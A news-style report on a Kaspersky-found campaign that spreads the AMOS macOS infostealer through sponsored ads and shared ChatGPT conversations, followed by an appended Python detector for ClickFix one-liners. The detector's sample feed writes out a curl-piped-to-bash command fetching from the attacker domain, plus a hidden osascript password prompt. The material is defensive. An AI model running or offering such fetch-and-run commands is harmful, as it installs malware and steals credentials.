Growing Malware Threats Target Mac Users Through Deceptive Campaigns
Kaspersky’s Discovery of a New Malware Scheme
Kaspersky Threat Research has uncovered a new malware campaign specifically targeting Mac users. The scheme uses paid Google search advertisements and shared conversations on the official ChatGPT website to deceive users into executing a single command that installs a powerful infostealer known as AMOS (Atomic macOS Stealer) together with a persistent backdoor on their systems.
How the Attackers Operate
The attackers purchase sponsored search ads for terms like “chatgpt atlas” to lure unsuspecting users to a seemingly legitimate installation guide for something called “ChatGPT Atlas for macOS.” This guide, however, is a decoy: it directs users to a shared ChatGPT conversation that has been stripped of everything except the alleged step-by-step installation instructions.
In a deceptive twist, users are prompted to copy a single line of code, open the Terminal application on their Macs, and paste this command. From there, they are encouraged to grant all requested permissions without understanding what the command is truly doing.
The Execution of the Malicious Command
Kaspersky’s research reveals that the command downloads and executes a script hosted on an external site, atlas-extension[.]com. This script repeatedly prompts for the user’s system password and validates each attempt against system commands. Once the correct password is entered, the script downloads the AMOS infostealer, which then activates and begins its malicious activities. This attack strategy aligns with a technique known as ClickFix, where users unwittingly execute shell commands that fetch and run external code.
Data Collection and Exfiltration
Once AMOS is installed, it embarks on an extensive data collection mission. This malware targets sensitive information—passwords, cookies, and data from popular browsers, as well as cryptocurrency wallet details from applications like Electrum, Coinomi, and Exodus. Furthermore, it seeks out files with TXT, PDF, and DOCX extensions located in common directories such as Desktop, Documents, and Downloads, along with information stored in the Notes application. The gathered data is then sent to servers controlled by the attackers. Concurrently, a backdoor is established, allowing the attackers remote access and enabling the malware to automatically start on reboot.
A Broader Trend in Cyber Threats
This incident underscores a troubling trend: infostealers are rapidly becoming one of the most significant threats in 2025. Cybercriminals are increasingly leveraging AI-related themes, creating fake AI tools, and generating AI content to make their schemes appear more legitimate. This particular attack fits into a larger pattern where attackers exploit popular, reputable platforms and their legitimate features to further their malicious agendas.
Expert Insights on the Effectiveness of the Attack
Vladimir Gursky, a Malware Analyst at Kaspersky, notes that the effectiveness of this campaign does not stem from complex technical exploits. Instead, it lies in how the attackers apply social engineering within a familiar AI context. The combination of a sponsored link leading to a well-designed page on a trusted domain, accompanied by a deceptively simple “installation guide,” leads many users to lower their guard. This blend of trust and simplicity can result in a full system compromise and persistent access for attackers.
Recommendations for Users
In light of this growing threat, experts recommend that users exercise caution:
- Be Skeptical of Unsolicited Guides: Any guide that instructs you to run Terminal or PowerShell commands, especially one that tells you to copy and paste a script from a website, should be treated with suspicion.
- Seek Clarification: If you encounter unclear instructions, close those web pages or delete the messages and consult with a knowledgeable person before acting.
- Use AI or Security Tools for Verification: Consider pasting suspicious commands into reputable AI platforms or security tools to analyze what the code does before executing it.
- Install Trusted Security Software: Protect all devices, including macOS and Linux systems, by installing reputable security solutions like Kaspersky Premium, which are equipped to identify and obstruct infostealers and associated threats.
Staying vigilant and informed is critical in today’s evolving cybersecurity landscape.
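As an added illustration of the ClickFix chain described above, and of the advice to analyze a pasted command before running it, here is a small Python checker written for this article (example code, not a Kaspersky tool): it flags fetch-and-execute patterns in a one-liner and, over a constructed process-event feed, correlates a terminal-launched download-and-run with a loop of password checks. The event format, the Terminal/iTerm2 parent names and the use of `dscl -authonly` as the validation command are assumptions; the article only says the script checks the password against system commands.

```python
import re
from collections import Counter

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3"}

def clickfix_indicators(cmd: str) -> list[str]:
    """Flag fetch-and-execute patterns in a one-liner before it is run."""
    found = set()
    # Program name of each pipeline/sequence stage, e.g. ["curl", "bash"]
    progs = [s.split()[0].rsplit("/", 1)[-1]
             for s in re.split(r"\|\||&&|;|\|", cmd) if s.strip()]
    for prev, cur in zip(progs, progs[1:]):
        if prev in FETCHERS and cur in INTERPRETERS:
            found.add("remote-fetch-piped-to-interpreter")
    if re.search(r"(\$\(|`|<\()\s*(curl|wget)\b", cmd):   # sh -c "$(curl ...)"
        found.add("command-substitution-fetch")
    if re.search(r"\bosascript\b.*with hidden answer", cmd):
        found.add("scripted-password-prompt")
    return sorted(found)

# Constructed sample of a process-execution feed (assumed format
# "<ts> <parent> -> <child>: <cmdline>"), not real telemetry; the
# dscl -authonly password check is an assumption, not from the article.
SAMPLE_EVENTS = """\
10:00:01 Terminal -> zsh: curl -fsSL http://atlas-extension[.]com/install.sh | bash
10:00:02 bash -> osascript: osascript -e 'display dialog "Password" with hidden answer'
10:00:02 bash -> dscl: dscl . -authonly alice
10:00:09 bash -> dscl: dscl . -authonly alice
10:00:15 bash -> dscl: dscl . -authonly alice
10:01:00 Terminal -> zsh: brew install wget
"""
EVENT_RE = re.compile(r"^(\S+) (\S+) -> (\S+): (.*)$")

def scan_events(text: str, auth_threshold: int = 3) -> dict:
    """Correlate a terminal fetch-and-run one-liner with repeated password checks."""
    alerts, auth_attempts = [], Counter()
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts, parent, child, cmdline = m.groups()
        inds = clickfix_indicators(cmdline)
        if inds and parent in {"Terminal", "iTerm2"}:
            alerts.append(f"{ts} pasted one-liner: {', '.join(inds)}")
        if child == "dscl" and "-authonly" in cmdline:
            auth_attempts[parent] += 1   # repeated validation = harvesting loop
    for proc, n in auth_attempts.items():
        if n >= auth_threshold:
            alerts.append(f"{proc} validated a password {n} times")
    return {"alerts": alerts, "auth_attempts": dict(auth_attempts)}
```

Running `scan_events(SAMPLE_EVENTS)` on the sample yields two alerts: the terminal one-liner that pipes a download into bash, and the shell that checked a password three times.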